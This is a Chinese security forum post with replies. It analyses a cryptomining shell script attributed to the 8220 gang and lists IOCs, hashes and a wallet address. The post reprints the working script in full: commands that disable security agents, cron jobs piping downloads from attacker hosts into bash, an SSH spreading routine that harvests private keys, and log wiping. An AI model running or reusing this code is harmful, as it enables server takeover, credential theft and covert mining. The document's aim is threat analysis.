吾爱破解 - 52pojie.cn

 找回密码
 注册[Register]

QQ登录

只需一步,快速开始

查看: 12776|回复: 78
收起左侧

[PC样本分析] 新·8220挖矿团伙样本分析报告

  [复制链接]
Hk_Mayfly 发表于 2021-11-9 14:51
使用论坛附件上传样本压缩包时必须使用压缩密码保护,压缩密码:52pojie,否则会导致论坛被杀毒软件等误报,论坛有权随时删除相关附件和帖子!
病毒分析分区附件样本、网址谨慎下载点击,可能对计算机产生破坏,仅供安全人员在法律允许范围内研究,禁止非法用途!
禁止求非法渗透测试、非法网络攻击、获取隐私等违法内容,即使对方是非法内容,也应向警方求助!

前言

在队里看见一个IOC信息http://192.210.200.66:1234/xmss,溯源后发现是8220挖矿团伙的挖矿脚本,于是拿下来进行分析。

溯源

IP信息

参数
IP 192.210.200.66
地理位置 美国 伊利诺伊州 芝加哥
ASN 36352
注册机构 ColoCrossing
注册地址 Brisbane, Australia, 澳大利亚
开放端口 15, 22, 49, 80, 102, 123, 138, 443, 554, 902, 1110, 1177, 1234, 1458, 1515, 1604, 1972, 2067, 2082, 2121, 2727, 3338, 3350, 3371, 3374, 3386, 3397, 4022, 4040, 4592, 4911, 4991, 5353, 5357, 5900, 5901, 5984, 6000, 6001, 7676, 7777, 8009, 8080, 8087, 8090, 8098, 9051, 9160, 9333, 9943, 9981, 9999, 10051, 10250, 49152

反查域名信息:

apacheorg.top
w.apacheorg.top
agent.apacheorg.xyz
agent.apacheorg.top
apacheorg.xyz
w.apacheorg.xyz

涉及恶意文件

5d4f2a009db79009b1b86d416019d808
ca815ac01df52cd997ae83de9606d378
5efc68ad277fe3fc36bfdf7671d8b1de
d2f5ec8c97e56f11c5f517aed83ed8b2
3997fb6cd3b603aad1cd40360be6c205
47be2940ef6970954ce71e8ad6d74a74
b1582ac0cfbe7cef692d748d1bf4b4b3

挖矿脚本分析

既然先拿到脚本,就先对脚本各个函数梳理一遍。

关闭防火墙

setenforce 0 2>/dev/null 0表示关闭防火墙,2表示以stderr模式输出到/dev/null

优化性能

  1. 设定最大打开文件数:ulimit -n 65535

  2. 禁用防火墙:ufw disable

  3. 允许恶意网络连接传输

    iptables -P INPUT ACCEPT
    iptables -P OUTPUT ACCEPT
    iptables -P FORWARD ACCEPT
    iptables -F
  4. 修改最大内存页hugepages以提高性能:echo "vm.nr_hugepages=$((1168+$(nproc)))" | tee -a /etc/sysctl.conf

  5. 禁用watchdog:echo 'kernel.nmi_watchdog=0' >>/etc/sysctl.conf

清除同类挖矿样本

netstat -antp | grep ':3333'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep ':4444'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep ':5555'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep ':7777'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep ':14444'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep ':5790'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep ':45700'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep ':2222'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep ':9999'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep ':20580'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep ':13531'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep '23.94.24.12'  | awk '{print $7}' | sed -e 's/\/.*//g' | xargs -I % kill -9 %
netstat -antp | grep '134.122.17.13'  | awk '{print $7}' | sed -e 's/\/.*//g' | xargs -I % kill -9 %
netstat -antp | grep '66.70.218.40'  | awk '{print $7}' | sed -e 's/\/.*//g' | xargs -I % kill -9 %
netstat -antp | grep '209.141.35.17'  | awk '{print $7}' | sed -e 's/\/.*//g' | xargs -I % kill -9 %
echo "123"
netstat -antp | grep '119.28.4.91'  | awk '{print $7}' | sed -e 's/\/.*//g' | xargs -I % kill -9 %
netstat -antp | grep '101.32.73.178'  | awk '{print $7}' | sed -e 's/\/.*//g' | xargs -I % kill -9 %
netstat -antp | grep 185.238.250.137 | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep tmate | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep kinsing | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep kdevtmpfsi | awk '{print $7}' | awk  -F '[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep pythonww | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep tcpp | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep c3pool | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep xmr | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep f2pool | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep crypto-pool | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep t00ls | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep vihansoft | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep mrbpool | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
ps -fe | grep '/tmp' | grep -v '.rsyslogds'|grep -v '.libs'|grep -v grep  | awk '{print $2}' | sed -e 's/\/.*//g' | xargs -I % kill -9 %
ps aux | grep -a -E "kdevtmpfsi|rot|kinsing|solr|f2pool|tcpp|xmr|tmate|185.238.250.137|c3pool" | awk '{print $2}' | xargs kill -9

设定Google公共DNS

if [ $(cat /etc/resolv.conf | grep 8.8.8.8|grep -v grep|wc -l) -eq '0' ];then
  echo 'nameserver 8.8.8.8' >> /etc/resolv.conf
else
  echo "ok"
fi

卸载安全服务

卸载阿里云盾和监控服务,屏蔽阿里云盾IP

if ps aux | grep -i '[a]liyun'; then
    /etc/init.d/aegis uninstall
    (wget -q -O - http://update.aegis.aliyun.com/download/uninstall.sh||curl -s http://update.aegis.aliyun.com/download/uninstall.sh)|bash; lwp-download http://update.aegis.aliyun.com/download/uninstall.sh /tmp/uninstall.sh; bash /tmp/uninstall.sh
    (wget -q -O - http://update.aegis.aliyun.com/download/quartz_uninstall.sh||curl -s http://update.aegis.aliyun.com/download/quartz_uninstall.sh)|bash; lwp-download http://update.aegis.aliyun.com/download/quartz_uninstall.sh /tmp/uninstall.sh; bash /tmp/uninstall.sh
    sudo pkill aliyun-service
    killall -9 aliyun-service
    sudo pkill AliYunDun
    killall -9 AliYunDun
    iptables -I INPUT -s 100.100.30.1/28 -j DROP
    iptables -I INPUT -s 140.205.201.0/28 -j DROP
    iptables -I INPUT -s 140.205.201.16/29 -j DROP
    iptables -I INPUT -s 140.205.201.32/28 -j DROP
    iptables -I INPUT -s 140.205.225.192/29 -j DROP
    iptables -I INPUT -s 140.205.225.200/30 -j DROP
    iptables -I INPUT -s 140.205.225.184/29 -j DROP
    iptables -I INPUT -s 140.205.225.183/32 -j DROP
    iptables -I INPUT -s 140.205.225.206/32 -j DROP
    iptables -I INPUT -s 140.205.225.205/32 -j DROP
    iptables -I INPUT -s 140.205.225.195/32 -j DROP
    iptables -I INPUT -s 140.205.225.204/32 -j DROP
    rm -rf /etc/init.d/agentwatch /usr/sbin/aliyun-service
    rm -rf /usr/local/aegis*
    systemctl stop aliyun.service
    systemctl disable aliyun.service
    service bcm-agent stop
    yum remove bcm-agent -y
    apt-get remove bcm-agent -y
    /usr/local/cloudmonitor/wrapper/bin/cloudmonitor.sh stop
    /usr/local/cloudmonitor/wrapper/bin/cloudmonitor.sh remove
    rm -rf /usr/local/cloudmonitor

卸载腾讯云镜

  elif ps aux | grep -i '[y]unjing'; then
    process=(sap100 secu-tcs-agent sgagent64 barad_agent agent agentPlugInD pvdriver )
    for i in ${process[@]}
    do
      for A in $(ps aux | grep $i | grep -v grep | awk '{print $2}')
      do
        kill -9 $A
      done
    done
    chkconfig --level 35 postfix off
    service postfix stop
    /usr/local/qcloud/stargate/admin/stop.sh
    /usr/local/qcloud/stargate/admin/uninstall.sh
    /usr/local/qcloud/YunJing/uninst.sh
    /usr/local/qcloud/monitor/barad/admin/stop.sh
    /usr/local/qcloud/monitor/barad/admin/uninstall.sh
    rm -rf /usr/local/sa
    rm -rf /usr/local/agenttools
    rm -rf /usr/local/qcloud
    rm -f /etc/cron.d/sgagenttask

设定下载命令

if ! [ -z "$(command -v wdl)" ] ; then DLB="wdl -O " ; fi ; if ! [ -z "$(command -v wge)" ] ; then DLB="wge -O " ; fi
if ! [ -z "$(command -v wget2)" ] ; then DLB="wget2 -O " ; fi ; if ! [ -z "$(command -v wget)" ] ; then DLB="wget -O " ; fi
if ! [ -z "$(command -v cdl)" ] ; then DLB="cdl -Lk -o " ; fi ; if ! [ -z "$(command -v cur)" ] ; then DLB="cur -Lk -o " ; fi
if ! [ -z "$(command -v curl2)" ] ; then DLB="curl2 -Lk -o " ; fi ; if ! [ -z "$(command -v curl)" ] ; then DLB="curl -Lk -o " ; fi
echo $DLB

定时脚本下载/更新,并执行

cronlow(){
  cr=$(crontab -l | grep -q $url | wc -l)
  # 检测crontab中是否有恶意脚本的下载/更新任务
  if [ ${cr} -eq 0 ];then
    crontab -r
    (crontab -l 2>/dev/null; echo "30 23 * * * (curl -s http://$url/xmss||wget -q -O - http://$url/xmss )|bash -sh")| crontab -
  else
    echo "cronlow skip"
  fi
}

将定时任务写入以下位置

/etc/cron.d/`whoami`
/etc/cron.d/apache
/var/spool/cron/`whoami`
/var/spool/cron/crontabs/`whoami`
/etc/cron.hourly/oanacroner1
cron(){
  if cat /etc/cron.d/`whoami` /etc/cron.d/apache /var/spool/cron/`whoami` /var/spool/cron/crontabs/`whoami` /etc/cron.hourly/oanacroner1 | grep -q "205.185.113.151\|5.196.247.12\|bash.givemexyz.xyz\|194.156.99.30\|cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xOTQuMTU2Ljk5LjMwL2QucHkiKS5yZWFkKCkpJw==\|bash.givemexyz.in\|205.185.116.78"
  then
    chattr -i -a /etc/cron.d/`whoami` /etc/cron.d/apache /var/spool/cron/`whoami` /var/spool/cron/crontabs/`whoami` /etc/cron.hourly/oanacroner1
    crontab -r
  fi
  if cat /etc/cron.d/`whoami` /etc/cron.d/apache /var/spool/cron/`whoami` /var/spool/cron/crontabs/`whoami` /etc/cron.hourly/oanacroner1 | grep "$url"
  then
    echo "Cron exists"
  else
    apt-get install -y cron
    yum install -y vixie-cron crontabs
    service crond start
    chkconfig --level 35 crond on
    echo "Cron not found"
    echo -e "30 23 * * * root (curl -s http://$url/xmss||wget -q -O - http://$url/xmss )|bash -sh\n##" > /etc/cron.d/`whoami`
    echo -e "30 23 * * * root (curl -s http://$url/xmss||wget -q -O - http://$url/xmss )|bash -sh\n##" > /etc/cron.d/apache
    echo -e "30 23 * * * root (curl -s http://$url/xmss||wget -q -O - http://$url/xmss )|bash -sh\n##" > /etc/cron.d/nginx
    echo -e "30 23 * * * (curl -s http://$url/xmss||wget -q -O - http://$url/xmss )|bash -sh\n##" > /var/spool/cron/`whoami`
    mkdir -p /var/spool/cron/crontabs
    echo -e "30 23 * * * (curl -s http://$url/xmss||wget -q -O - http://$url/xmss )|bash -sh\n##" > /var/spool/cron/crontabs/`whoami`
    mkdir -p /etc/cron.hourly
    echo "(curl -s http://$url/xmss||wget -q -O - http://$url/xmss )|bash -sh" > /etc/cron.hourly/oanacroner1 | chmod 755 /etc/cron.hourly/oanacroner1
    echo "(curl -s http://$url/xmss||wget -q -O - http://$url/xmss )|bash -sh" > /etc/cron.hourly/oanacroner1 | chmod 755 /etc/init.d/down
    chattr +ai -V /etc/cron.d/`whoami` /etc/cron.d/apache /var/spool/cron/`whoami` /var/spool/cron/crontabs/`whoami` /etc/cron.hourly/oanacroner1 /etc/init.d/down
  fi
  chattr -i -a /etc/cron.d/`whoami` /etc/cron.d/apache /var/spool/cron/`whoami` /var/spool/cron/crontabs/`whoami` /etc/cron.hourly/oanacroner1
  echo "(curl -s http://$url/xmss||wget -q -O - http://$url/xmss )|bash -sh" > /etc/init.d/down | chmod 755 /etc/init.d/down
}

搜集用户信息进行传播

搜集用户ssh端口用户列表主机列表登录凭证信息,并尝试进行登录,然后下载下载执行xmss挖矿脚本

localgo() {
  echo "localgo start"
  myhostip=$(curl -sL icanhazip.com)
  KEYS=$(find ~/ /root /home -maxdepth 3 -name 'id_rsa*' | grep -vw pub)
  KEYS2=$(cat ~/.ssh/config /home/*/.ssh/config /root/.ssh/config | grep IdentityFile | awk -F "IdentityFile" '{print $2 }')
  KEYS3=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -E "(ssh|scp)" | awk -F ' -i ' '{print $2}' | awk '{print $1'})
  KEYS4=$(find ~/ /root /home -maxdepth 3 -name '*.pem' | uniq)
  HOSTS=$(cat ~/.ssh/config /home/*/.ssh/config /root/.ssh/config | grep HostName | awk -F "HostName" '{print $2}')
  HOSTS2=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -E "(ssh|scp)" | grep -oP "([0-9]{1,3}\.){3}[0-9]{1,3}")
  HOSTS3=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -E "(ssh|scp)" | tr ':' ' ' | awk -F '@' '{print $2}' | awk -F '{print $1}')
  HOSTS4=$(cat /etc/hosts | grep -vw "0.0.0.0" | grep -vw "127.0.1.1" | grep -vw "127.0.0.1" | grep -vw $myhostip | sed -r '/\n/!s/[0-9.]+/\n&\n/;/^([0-9]{1,3}\.){3}[0-9]{1,3}\n/P;D' | awk '{print $1}')
  HOSTS5=$(cat ~/*/.ssh/known_hosts /home/*/.ssh/known_hosts /root/.ssh/known_hosts | grep -oP "([0-9]{1,3}\.){3}[0-9]{1,3}" | uniq)
  HOSTS6=$(ps auxw | grep -oP "([0-9]{1,3}\.){3}[0-9]{1,3}" | grep ":22" | uniq)
  USERZ=$(
    echo "root"
    find ~/ /root /home -maxdepth 2 -name '\.ssh' | uniq | xargs find | awk '/id_rsa/' | awk -F'/' '{print $3}' | uniq | grep -wv ".ssh"
  )
  USERZ2=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -vw "cp" | grep -vw "mv" | grep -vw "cd " | grep -vw "nano" | grep -v grep | grep -E "(ssh|scp)" | tr ':' ' ' | awk -F '@' '{print $1}' | awk '{print $4}' | uniq)
  sshports=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -vw "cp" | grep -vw "mv" | grep -vw "cd " | grep -vw "nano" | grep -v grep | grep -E "(ssh|scp)" | tr ':' ' ' | awk -F '-p' '{print $2}' | awk '{print $1}' | sed 's/[^0-9]*//g' | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2- | sed -e "\$a22")
  userlist=$(echo "$USERZ $USERZ2" | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2- | grep -vw "." | grep -vw "ssh" | sed '/\./d')
  hostlist=$(echo "$HOSTS $HOSTS2 $HOSTS3 $HOSTS4 $HOSTS5 $HOSTS6" | grep -vw 127.0.0.1 | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2-)
  keylist=$(echo "$KEYS $KEYS2 $KEYS3 $KEYS4" | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2-)
  i=0
  for user in $userlist; do
    for host in $hostlist; do
      for key in $keylist; do
        for sshp in $sshports; do
          ((i++))
          if [ "${i}" -eq "20" ]; then
            sleep 5
            ps wx | grep "ssh -o" | awk '{print $1}' | xargs kill -9 &>/dev/null &
            i=0
          fi

          #Wait 5 seconds after every 20 attempts and clean up hanging processes

          chmod +r $key
          chmod 400 $key
          echo "$user@$host"
          ssh -oStrictHostKeyChecking=no -oBatchMode=yes -oConnectTimeout=3 -i $key $user@$host -p $sshp "(curl -s http://$ipurl/xmss||wget -q -O - http://$ipurl/xmss)|bash -sh; echo $base | base64 -d | bash -; lwp-download http://$ipurl/xms /tmp/xms; bash /tmp/xms; rm -rf /tmp/xms"
          ssh -oStrictHostKeyChecking=no -oBatchMode=yes -oConnectTimeout=3 -i $key $user@$host -p $sshp "(curl -s http://$ipurl/xmss||wget -q -O - http://$ipurl/xmss)|bash -sh; echo $base | base64 -d | bash -; lwp-download http://$ipurl/xms /tmp/xms; bash /tmp/xms; rm -rf /tmp/xms"
        done
      done
    done
  done
  # scangogo
  echo "local done"
}

安装挖矿服务

setupxmrservice(){
  echo "
  • Removing previous c3pool miner (if any)"   if sudo -n true 2>/dev/null; then     sudo systemctl stop c3pool_miner.service   fi   killall -9 xmrig   echo "
  • Removing $HOME/c3pool directory"   rm -rf $HOME/c3pool   mv /tmp/.rsyslogds.sh /usr/sbin/.rsyslogds.sh   if [ $(netstat -antp|grep 'rsyslogds'|grep 'ESTABLISHED'|grep -v grep|wc -l) -eq '0' ];then     $DLB /usr/sbin/.rsyslogds $ipurl/.rsyslogds;chmod +x /usr/sbin/.rsyslogds     # preparing script     echo "
  • Creating $HOME/c3pool/miner.sh script"     mv /tmp/.rsyslogds.sh /usr/sbin/.rsyslogds.sh     chmod +x /usr/sbin/.rsyslogds.sh     /bin/bash /usr/sbin/.rsyslogds.sh >/dev/null 2>&1     # preparing script background work and work under reboot     if ! grep .rsyslogds.sh $HOME/.profile >/dev/null; then       echo "
  • Adding $HOME/c3pool/miner.sh script to $HOME/.profile"       echo "/usr/sbin/.rsyslogds.sh >/dev/null 2>&1" >>$HOME/.profile     else       echo "Looks like $HOME/c3pool/miner.sh script is already in the $HOME/.profile"     fi     if ! grep rsyslogds.sh /etc/rc.d/rc.local >/dev/null; then       echo "
  • Adding $HOME/c3pool/miner.sh script to /etc/rc.d/rc.local"       echo "/usr/sbin/.rsyslogds.sh >/dev/null 2>&1" >>/etc/rc.d/rc.local     else       echo "Looks like $HOME/c3pool/miner.sh script is already in the $HOME/.profile"     fi     if [[ $(grep MemTotal /proc/meminfo | awk '{print $2}') > 3500000 ]]; then       echo "
  • Enabling huge pages"       echo "vm.nr_hugepages=$((1168+$(nproc)))" | sudo tee -a /etc/sysctl.conf       sudo sysctl -w vm.nr_hugepages=$((1168+$(nproc)))     fi     if ! type systemctl >/dev/null; then       echo "
  • Running miner in the background (see logs in $HOME/c3pool/xmrig.log file)"       /bin/bash /usr/sbin/.rsyslogds.sh >/dev/null 2>&1       echo "ERROR: This script requires \"systemctl\" systemd utility to work correctly."       echo "Please move to a more modern Linux distribution or setup miner activation after reboot yourself if possible."     else       echo "
  • Creating c3pool_miner systemd service"       sudo mv /tmp/rsyslogds.service /etc/systemd/system/rsyslogds.service       echo "
  • Starting c3pool_miner systemd service"       sudo killall xmrig 2>/dev/null       sudo systemctl daemon-reload       sudo systemctl enable rsyslogds.service       sudo systemctl start rsyslogds.service       echo "To see miner service logs run \"sudo journalctl -u c3pool_miner -f\" command"     fi   fi }
  • 这里安装了挖矿程序e5c3720e14a5ea7f678e0a9835d28283

    恶意脚本整体流程分析

    # 杀掉阿里云云盾、腾讯云镜
    der
    
    if [ -w /usr/sbin ]; then
        SPATH=/usr/sbin
      else
      SPATH=/tmp
    fi
    echo $SPATH
    
    # 创建.rsyslogds.sh文件,最后启动挖矿服务用到
    cat >/tmp/.rsyslogds.sh <<EOL
    #!/bin/bash
    # 文件v中是MD5嘛,用以校验.rsyslogds文件的MD5值
    x_md51 = `curl http://agent.apacheorg.xyz:1234/v`
    x_md52 = `md5sum /usr/sbin/.rsyslogds| awk '{print $1}'`
    # 校验MD5
    if [ "$x_md52" = "$x_md51" ]; then
      # 如果.rsyslogds在进程中没有启动,则启动.rsyslogds
      if ! pidof .rsyslogds >/dev/null; then
        /usr/sbin/.rsyslogds
      fi
    else
      # 如果MD5不相同,则从远端下载.rsyslogds程序,并杀掉非真.rsyslogds,运行真.rsyslogds
      $DLB /usr/sbin/.rsyslogds $ipurl/.rsyslogds;chmod +x /usr/sbin/.rsyslogds
      pkill .rsyslogds
      /usr/sbin/.rsyslogds
    fi
    EOL
    
    # 创建rsyslogds守护进程
    cat >/tmp/rsyslogds.service <<EOL
    [Unit]
    Description=rsyslogdservice
    [Service]
    ExecStart=/usr/sbin/.rsyslogds
    Restart=always
    Nice=10
    CPUWeight=1
    [Install]
    WantedBy=multi-user.target
    EOL
    
    MD5_1_XMR="e5c3720e14a5ea7f678e0a9835d28283"
    MD5_2_XMR=`md5sum $SPATH/.rsyslogds | awk '{print $1}'`
    
    # 这里看有没有这个路径,没有路径表明肯定没有.rsyslogds文件
    if [ "$SPATH" = "/usr/sbin" ]
    then
      # 同样这,本地校验.rsyslogds, 的MD5值这里应该写错了,应该是不等于
      if [ "$MD5_1_XMR" = "$MD5_2_XMR" ]
      then
        # .rsyslogds文件MD5相同,下载并运行.rsyslogds
        $DLB $SPATH/.rsyslogds $ipurl/.rsyslogds;chmod +x $SPATH/.rsyslogds;$SPATH/.rsyslogds
        # 启动挖矿服务
        setupxmrservice
        # 搜集ssh端口、用户列表、主机列表、凭证列表进行登录,传播挖矿脚本
        localgo
        # 设定脚本下载/更新的定时任务
        cron
      else
        # 运行挖矿程序
        $SPATH/.rsyslogds
        # 启动服务
        setupxmrservice
        # 搜集ssh端口、用户列表、主机列表、凭证列表进行登录,传播挖矿脚本
        localgo
        # 设定脚本下载/更新的定时任务
        cron
      fi
    else
      # 下载并运行恶意程序.rsyslogds
      $DLB $SPATH/.rsyslogds $ipurl/.rsyslogds;chmod +x $SPATH/.rsyslogds;$SPATH/.rsyslogds
      # 设置脚本执行的定时任务
      cronlow
    fi
    
    # 脚本会检查.inis文件是否存在,不存在就从远端下载后拖到后台运行
    if [ $(ps aux|grep inis|grep -v grep|wc -l) -eq '0' ];
    then
      $DLB $SPATH/.inis $ipurl/.inis;chmod +x $SPATH/.inis
      cd $SPATH
      nohup ./.inis &
    else
      echo "ok"
    fi
    
    history -c
    der
    echo 0>/root/.ssh/authorized_keys
    echo 0>/var/spool/mail/root
    echo 0>/var/log/wtmp
    echo 0>/var/log/secure
    echo 0>/var/log/cronrot
    echo 0>~/.bash_history

    .inis文件

    #!/bin/bash
    if ! [ -z "$(command -v wdl)" ] ; then DLB="wdl -O " ; fi ; if ! [ -z "$(command -v wge)" ] ; then DLB="wge -O " ; fi
    if ! [ -z "$(command -v wget2)" ] ; then DLB="wget2 -O " ; fi ; if ! [ -z "$(command -v wget)" ] ; then DLB="wget -O " ; fi
    if ! [ -z "$(command -v cdl)" ] ; then DLB="cdl -Lk -o " ; fi ; if ! [ -z "$(command -v cur)" ] ; then DLB="cur -Lk -o " ; fi
    if ! [ -z "$(command -v curl2)" ] ; then DLB="curl2 -Lk -o " ; fi ; if ! [ -z "$(command -v curl)" ] ; then DLB="curl -Lk -o " ; fi
    echo $DLB
    if [ -w /usr/sbin ]; then
      SPATH=/usr/sbin
    else
      SPATH=/tmp
    fi
    kill(){
      ps aux | grep -v '.rsyslogds' |grep -v '.libs'| grep -v grep | awk '{if($3>50.0) print $2}' | while read procid
      do
        kill -9 $procid
      done
    }
    while true; do
      ipurl="http://agent.apacheorg.top:1234"
      MD5_1_XMR = `curl -fsSL $ipurl/v||wget -q -O - $ipurl/v`
      MD5_2_XMR=`md5sum $SPATH/.rsyslogds | awk '{print $1}'`
      # 这里我怀疑也是写错了,应该是不等于
      if [ "$MD5_1_XMR" = "$MD5_2_XMR" ]; then
        if [ $(ps -aux|grep '.rsyslogds'|grep -v grep|wc -l) -eq '0' ];then
          $SPATH/.rsyslogds
        else
          echo "ok"
        fi
      else
        $DLB $SPATH/.rsyslogds $ipurl/.rsyslogds;chmod +x $SPATH/.rsyslogds;$SPATH/.rsyslogds
        chattr +ai $SPATH/.rsyslogds
      fi
      kill
      sleep 1m
    done
    

    挖矿程序分析:.rsyslogds

    基本信息

    参数
    文件名 .rsyslogds
    MD5 e5c3720e14a5ea7f678e0a9835d28283
    SHA256 86843e8a0b7079ab20e0f258600ef597b04ffc35d8a706d250e4122bd1cc4692
    文件类型 ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), statically linked, stripped
    文件大小 2077172 bytes
    其他信息 upx

    程序分析

    upx脱壳后,打开发现

    !

    这就是用的现成的XMRig挖矿项目编译,版本为6.7.1,编译日期为2021/01/12

    提取到钱包地址:48BBjhM6wjtVPPteiAAyy4FfQogMVvJdSWqbT3T8L9cGb9NhUPRtMHkYVmzLgpYEiuh9B6J1yrXhPdjtnmf7rfQyA73rWaF

    IOC信息

    MD5
    e5c3720e14a5ea7f678e0a9835d28283
    51cf7dde4003aa6901918e373bf91b18
    01972190a83b183b56064d82045de8d6
    caa9ea2c522fc6268c7e976142d48775
    
    IP
    205.185.113.151
    194.156.99.30
    5.196.247.12
    205.185.116.78
    192.210.200.66
    
    domain
    bash.givemexyz.xyz
    bash.givemexyz.in
    agent.apacheorg.top
    
    URL
    http://192.210.200.66:1234/xmss
    http://192.210.200.66:1234/v
    http://192.210.200.66:1234/.rsyslogds
    http://192.210.200.66:1234/.inis
    http://205.185.113.59:1234/xmss
    http://205.185.113.59:1234/v
    http://205.185.113.59:1234/.rsyslogds
    http://205.185.113.59:1234/.inis
    http://agent.apacheorg.top:1234/v
    http://agent.apacheorg.top:1234/xmss
    http://agent.apacheorg.top:1234/.rsyslogds
    http://agent.apacheorg.top:1234/.inis
    
    钱包地址
    48BBjhM6wjtVPPteiAAyy4FfQogMVvJdSWqbT3T8L9cGb9NhUPRtMHkYVmzLgpYEiuh9B6J1yrXhPdjtnmf7rfQyA73rWaF

    xmss.zip

    4.2 KB, 下载次数: 124, 下载积分: 吾爱币 -1 CB

    解压密码:52pojie

    免费评分

    参与人数 23威望 +1 吾爱币 +40 热心值 +23 收起 理由
    Hmily + 1 + 20 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!
    Moliyadi + 1 + 1 我很赞同!
    w229623 + 1 + 1 我很赞同!
    it_harry + 1 + 1 谢谢@Thanks!
    yan182 + 1 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!
    kiopc + 1 + 1 虽然挖矿的粗心大意,但是大佬可不粗心大意
    formli + 1 我很赞同!
    xiexiwen1 + 1 热心回复!
    ELIXH + 1 + 1 谢谢@Thanks!
    jiyahui0914 + 1 1
    Jinjibewater + 1 + 1 谢谢@Thanks!
    afengheafu + 1 + 1 热心回复!
    languor + 1 + 1 用心讨论,共获提升!
    ForGot_227 + 3 + 1 鼓励转贴优秀软件安全工具和文档!
    123Ambition + 1 + 1 谢谢@Thanks!
    zhefox + 1 + 1 我很赞同!
    3303232005 + 1 + 1 热心回复!
    skiss + 1 + 1 谢谢@Thanks!
    d3d + 1 + 1 欢迎分析讨论交流,吾爱破解论坛有你更精彩!
    CPip + 1 我很赞同!
    cc66528 + 1 + 1 我很赞同!
    engeng2 + 1 + 1 热心回复!
    蓝纹鲸 + 1 + 1 欢迎分析讨论交流,吾爱破解论坛有你更精彩!

    查看全部评分

    发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

    zich123 发表于 2021-11-9 15:37
    这脚本最重要的门罗钱包地址居然少了一位...
    此ID不存在 发表于 2021-11-9 15:11
    本帖最后由 此ID不存在 于 2021-11-9 17:46 编辑

    卡巴斯基对此页面报毒
    事件: 检测到恶意对象
    用户: LAPTOP-UOAGND7N\ThinkPad
    用户类型: 活动用户
    应用程序名称: msedge.exe
    应用程序路径: C:\Program Files (x86)\Microsoft\Edge\Application
    组件: 网页反病毒
    结果说明: 检测到
    类型: 木马
    名称: HEUR:Trojan-Downloader.Shell.Miner.gen
    精确度: 不确切
    威胁级别: 高
    对象类型: 文件
    对象名称: thread-1540889-1-1.html
    对象路径: https://www.52pojie.cn
    MD5: 9D1AE8F86D163B6E42408B3C5E5EE7BF
    原因: 专家分析
    数据库发布日期: 昨天,2021/11/8 23:37:00



    允许后提示检测到威胁

    事件: 检测到恶意对象
    用户: LAPTOP-UOAGND7N\ThinkPad
    用户类型: 活动用户
    应用程序名称: msedge.exe
    应用程序路径: C:\Program Files (x86)\Microsoft\Edge\Application
    组件: 文件反病毒
    结果说明: 检测到
    类型: 木马
    名称: HEUR:Trojan-Downloader.Shell.Miner.gen
    精确度: 不确切
    威胁级别: 高
    对象类型: 文件
    对象名称: f_0011ea
    对象路径: C:\Users\ThinkPad\AppData\Local\Microsoft\Edge\User Data\Default\Cache
    MD5: 22859EB6103A289BCA594D71AF120150
    原因: 专家分析
    数据库发布日期: 昨天,2021/11/8 23:37:00

    limit7 发表于 2021-11-9 17:52
    chuxia12 发表于 2021-11-9 15:09
    虽然看不懂,但是大佬nb
     楼主| Hk_Mayfly 发表于 2021-11-9 15:26
    此ID不存在 发表于 2021-11-9 15:11
    卡巴斯基对此页面报毒

    允许后提示检测到威胁

    这是下载挖矿脚本的路径,下载后别运行就行。
    墨白先生 发表于 2021-11-9 15:35
    虽然看不懂,但是大佬nb
    Hao轩 发表于 2021-11-9 16:15
    挖矿 遇到后电脑会明显变卡 希望各位也要注意防范吧
    Bboxer 发表于 2021-11-9 16:25
    虽然看不懂,但是大佬nb
